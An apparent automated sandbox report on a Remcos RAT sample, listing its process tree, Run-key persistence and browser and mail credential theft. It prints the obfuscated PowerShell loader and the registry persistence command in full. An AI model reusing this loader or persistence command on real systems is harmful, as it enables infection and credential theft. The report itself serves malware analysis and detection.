                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbagJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#skedekatarer negligent azoparaffin cardinalfishes germens asbestinize mell #>;$vorticularly='conversed';<#unabdicated amagermadens hovedkortene arbejdsvrelsers indehavde storgaard #>;$forlbsmodellen=$paedeutics+$host.ui; function abkhasian($amphivorous){if ($forlbsmodellen) {$knipsendes++;}$scythework=$flyingly+$amphivorous.'length'-$knipsendes; for( $idiocyclophanous=4;$idiocyclophanous -lt $scythework;$idiocyclophanous+=5){$geometrierne=$idiocyclophanous;$faujdar+=$amphivorous[$idiocyclophanous];$unstooped='tinnets';}$faujdar;}function yderzoner($modernes){ . ($syvtallene) ($modernes);}$stenbroer=abkhasian ' ,enmaflboun,uzstreirecelprotlmotoaf na/over ';$stenbroer+=abkhasian 'glds5 ins. mud0 ,io e v(leukwodaxia frnsoffd fdsoopnawkruksconv py mndunstst e p yt1befo0 fug.driv0gy e; ret e uawver isocinforu6 fla4pr,b;rein m lix pe 6cosi4 hem;syn, pterrjakovduks:sv n1v di3mine1oppu.ambu0mi.u)quin un igkar egif,censikslaso cua/ .ut2stad0rute1semi0 san0 for1rum.0u se1tids forsf.natitar r eievaccfexcoo.hanxtaff/ iel1unsk3haan1duel.fre 0baro ';$genbrugelig=abkhasian 'computelts hole jler lge-cormae osgoverebi dnsemitprop ';$bruttonationalprodukternes=abkhasian ' arch udbt aa,tgallp fels,ver: hek/haar/irakpo oilgrc,i isne i tl errtfor,d ins.gipstspawo w rpicos/ pluupneunsothdanthedommr dokbfa gyresag ,kogblokerecolnonhsk lkeba,p. .hoagalgaexotfquin ';$margueritha=abkhasian ' epi> nes ';$syvtallene=abkhasian 'aftaifab e aalxmo i ';$trappens='lobale207';$idiocyclophanousnhalerende='\rafting.ans';yderzoner (abkhasian 'proc$si igmotolmaanot.lebfritadikalrem,:rhysecadgminteb slyu ,rosdiacq stuugrune rte=de e$dendesammnsjlevknot:kastaka,tpabsipflandlgdoaud ataffaalbin+chur$hemaimongdtramipegaotradcensnydownckn,glforeofdevpt.onholi,a esenfallo indu echses rnfugthkattaudfolbiblespekrvelmethyrnharmdfdeve und ');yderzoner (abkhasian 'madk$hal.gne.ll accok aibc.stafjerlunsu:andisphilt t nu sugdtille opfnincitintrebletrkonsb ccrregiduddeemedltlary=glat$acupba.barsortuo,klt kyntcluboscabnph nab bbtphyti godoan.inbepaa ollfluopdimar erroforbd hypu u pks mpt nonekongr,aasndaa efodbs.eng.temps nfpsmoolv luiurantth.r( ,eg$ caymsec acontremangautou pluecivircrinide etryothadhsacam.) fld ');yderzoner (abkhasian 'unca[mit.n,ilsequintdat .gymnsduale zemrme,nvlibiieighcvolue fuspalleobordi andnburrt,anzmedicaarsen spoasnorg ,rnetabsrg li] pre:like: s es .ntecantcmisiukon rjerni da tkibbyharup anarordroka itpermojo rcunpoobotrlunde raun=drag afbe[protnkonte rentreto.d hysbrstegrssc reluegnsr infijapht triyalkops orrh jsobefit rchoharmc iboundel.ymbt cirysafepb rbefi t]snuf: pr.: kamtmagnlhiersvice1angl2 vic ');$bruttonationalprodukternes=$studenterbrdet[0];$exhaust=(abkhasian 'phil$omsogtegnlkberominib kr.a,artlpost:smaapinjeaen or t,recelindifftpayehballoworrorigid seu=unafnfulde ,erw kla-de aof.rwbtyrajoveretulrcbount lst rinsreflytjenskhoutp imeprofm mi .kab nindlebag
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#skedekatarer negligent azoparaffin cardinalfishes germens asbestinize mell #>;$vorticularly='conversed';<#unabdicated amagermadens hovedkortene arbejdsvrelsers indehavde storgaard #>;$forlbsmodellen=$paedeutics+$host.ui; function abkhasian($amphivorous){if ($forlbsmodellen) {$knipsendes++;}$scythework=$flyingly+$amphivorous.'length'-$knipsendes; for( $idiocyclophanous=4;$idiocyclophanous -lt $scythework;$idiocyclophanous+=5){$geometrierne=$idiocyclophanous;$faujdar+=$amphivorous[$idiocyclophanous];$unstooped='tinnets';}$faujdar;}function yderzoner($modernes){ . ($syvtallene) ($modernes);}$stenbroer=abkhasian ' ,enmaflboun,uzstreirecelprotlmotoaf na/over ';$stenbroer+=abkhasian 'glds5 ins. mud0 ,io e v(leukwodaxia frnsoffd fdsoopnawkruksconv py mndunstst e p yt1befo0 fug.driv0gy e; ret e uawver isocinforu6 fla4pr,b;rein m lix pe 6cosi4 hem;syn, pterrjakovduks:sv n1v di3mine1oppu.ambu0mi.u)quin un igkar egif,censikslaso cua/ .ut2stad0rute1semi0 san0 for1rum.0u se1tids forsf.natitar r eievaccfexcoo.hanxtaff/ iel1unsk3haan1duel.fre 0baro ';$genbrugelig=abkhasian 'computelts hole jler lge-cormae osgoverebi dnsemitprop ';$bruttonationalprodukternes=abkhasian ' arch udbt aa,tgallp fels,ver: hek/haar/irakpo oilgrc,i isne i tl errtfor,d ins.gipstspawo w rpicos/ pluupneunsothdanthedommr dokbfa gyresag ,kogblokerecolnonhsk lkeba,p. .hoagalgaexotfquin ';$margueritha=abkhasian ' epi> nes ';$syvtallene=abkhasian 'aftaifab e aalxmo i ';$trappens='lobale207';$idiocyclophanousnhalerende='\rafting.ans';yderzoner (abkhasian 'proc$si igmotolmaanot.lebfritadikalrem,:rhysecadgminteb slyu ,rosdiacq stuugrune rte=de e$dendesammnsjlevknot:kastaka,tpabsipflandlgdoaud ataffaalbin+chur$hemaimongdtramipegaotradcensnydownckn,glforeofdevpt.onholi,a esenfallo indu echses rnfugthkattaudfolbiblespekrvelmethyrnharmdfdeve und ');yderzoner (abkhasian 'madk$hal.gne.ll accok aibc.stafjerlunsu:andisphilt t nu sugdtille opfnincitintrebletrkonsb ccrregiduddeemedltlary=glat$acupba.barsortuo,klt kyntcluboscabnph nab bbtphyti godoan.inbepaa ollfluopdimar erroforbd hypu u pks mpt nonekongr,aasndaa efodbs.eng.temps nfpsmoolv luiurantth.r( ,eg$ caymsec acontremangautou pluecivircrinide etryothadhsacam.) fld ');yderzoner (abkhasian 'unca[mit.n,ilsequintdat .gymnsduale zemrme,nvlibiieighcvolue fuspalleobordi andnburrt,anzmedicaarsen spoasnorg ,rnetabsrg li] pre:like: s es .ntecantcmisiukon rjerni da tkibbyharup anarordroka itpermojo rcunpoobotrlunde raun=drag afbe[protnkonte rentreto.d hysbrstegrssc reluegnsr infijapht triyalkops orrh jsobefit rchoharmc iboundel.ymbt cirysafepb rbefi t]snuf: pr.: kamtmagnlhiersvice1angl2 vic ');$bruttonationalprodukternes=$studenterbrdet[0];$exhaust=(abkhasian 'phil$omsogtegnlkberominib kr.a,artlpost:smaapinjeaen or t,recelindifftpayehballoworrorigid seu=unafnfulde ,erw kla-de aof.rwbtyrajoveretulrcbount lst rinsreflytjenskhoutp im
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "gummicheckene" /t reg_expand_sz /d "%assumably% -windowstyle 1 $dilatationens=(gp -path 'hkcu:\software\darksomeness\').subtropiske;%assumably% ($dilatationens)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#skedekatarer negligent azoparaffin cardinalfishes germens asbestinize mell #>;$vorticularly='conversed';<#unabdicated amagermadens hovedkortene arbejdsvrelsers indehavde storgaard #>;$forlbsmodellen=$paedeutics+$host.ui; function abkhasian($amphivorous){if ($forlbsmodellen) {$knipsendes++;}$scythework=$flyingly+$amphivorous.'length'-$knipsendes; for( $idiocyclophanous=4;$idiocyclophanous -lt $scythework;$idiocyclophanous+=5){$geometrierne=$idiocyclophanous;$faujdar+=$amphivorous[$idiocyclophanous];$unstooped='tinnets';}$faujdar;}function yderzoner($modernes){ . ($syvtallene) ($modernes);}$stenbroer=abkhasian ' ,enmaflboun,uzstreirecelprotlmotoaf na/over ';$stenbroer+=abkhasian 'glds5 ins. mud0 ,io e v(leukwodaxia frnsoffd fdsoopnawkruksconv py mndunstst e p yt1befo0 fug.driv0gy e; ret e uawver isocinforu6 fla4pr,b;rein m lix pe 6cosi4 hem;syn, pterrjakovduks:sv n1v di3mine1oppu.ambu0mi.u)quin un igkar egif,censikslaso cua/ .ut2stad0rute1semi0 san0 for1rum.0u se1tids forsf.natitar r eievaccfexcoo.hanxtaff/ iel1unsk3haan1duel.fre 0baro ';$genbrugelig=abkhasian 'computelts hole jler lge-cormae osgoverebi dnsemitprop ';$bruttonationalprodukternes=abkhasian ' arch udbt aa,tgallp fels,ver: hek/haar/irakpo oilgrc,i isne i tl errtfor,d ins.gipstspawo w rpicos/ pluupneunsothdanthedommr dokbfa gyresag ,kogblokerecolnonhsk lkeba,p. .hoagalgaexotfquin ';$margueritha=abkhasian ' epi> nes ';$syvtallene=abkhasian 'aftaifab e aalxmo i ';$trappens='lobale207';$idiocyclophanousnhalerende='\rafting.ans';yderzoner (abkhasian 'proc$si igmotolmaanot.lebfritadikalrem,:rhysecadgminteb slyu ,rosdiacq stuugrune rte=de e$dendesammnsjlevknot:kastaka,tpabsipflandlgdoaud ataffaalbin+chur$hemaimongdtramipegaotradcensnydownckn,glforeofdevpt.onholi,a esenfallo indu echses rnfugthkattaudfolbiblespekrvelmethyrnharmdfdeve und ');yderzoner (abkhasian 'madk$hal.gne.ll accok aibc.stafjerlunsu:andisphilt t nu sugdtille opfnincitintrebletrkonsb ccrregiduddeemedltlary=glat$acupba.barsortuo,klt kyntcluboscabnph nab bbtphyti godoan.inbepaa ollfluopdimar erroforbd hypu u pks mpt nonekongr,aasndaa efodbs.eng.temps nfpsmoolv luiurantth.r( ,eg$ caymsec acontremangautou pluecivircrinide etryothadhsacam.) fld ');yderzoner (abkhasian 'unca[mit.n,ilsequintdat .gymnsduale zemrme,nvlibiieighcvolue fuspalleobordi andnburrt,anzmedicaarsen spoasnorg ,rnetabsrg li] pre:like: s es .ntecantcmisiukon rjerni da tkibbyharup anarordroka itpermojo rcunpoobotrlunde raun=drag afbe[protnkonte rentreto.d hysbrstegrssc reluegnsr infijapht triyalkops orrh jsobefit rchoharmc iboundel.ymbt cirysafepb rbefi t]snuf: pr.: kamtmagnlhiersvice1angl2 vic ');$bruttonationalprodukternes=$studenterbrdet[0];$exhaust=(abkhasian 'phil$omsogtegnlkberominib kr.a,artlpost:smaapinjeaen or t,recelindifftpayehballoworrorigid seu=unafnfulde ,erw kla-de aof.rwbtyrajoveretulrcbount lst rinsreflytjenskhoutp imeprofm mi .kab nindlebagJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "gummicheckene" /t reg_expand_sz /d "%assumably% -windowstyle 1 $dilatationens=(gp -path 'hkcu:\software\darksomeness\').subtropiske;%assumably% ($dilatationens)"Jump to behavior
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,13_2_0041881C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword14_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword14_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword14_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7136, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8BJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		11
                Scripting                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		2
                Obfuscated Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter                		1
                Registry Run Keys / Startup Folder                		412
                Process Injection                		1
                Software Packing                		1
                Credentials in Registry                		2
                File and Directory Discovery                		SMB/Windows Admin Shares11
                Input Capture                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell                		Login Hook1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		NTDS18
                System Information Discovery                		Distributed Component Object Model2
                Clipboard Data                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets21
                Security Software Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry                		Cached Domain Credentials41
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture113
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                Virtualization/Sandbox Evasion                		DCSync4
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
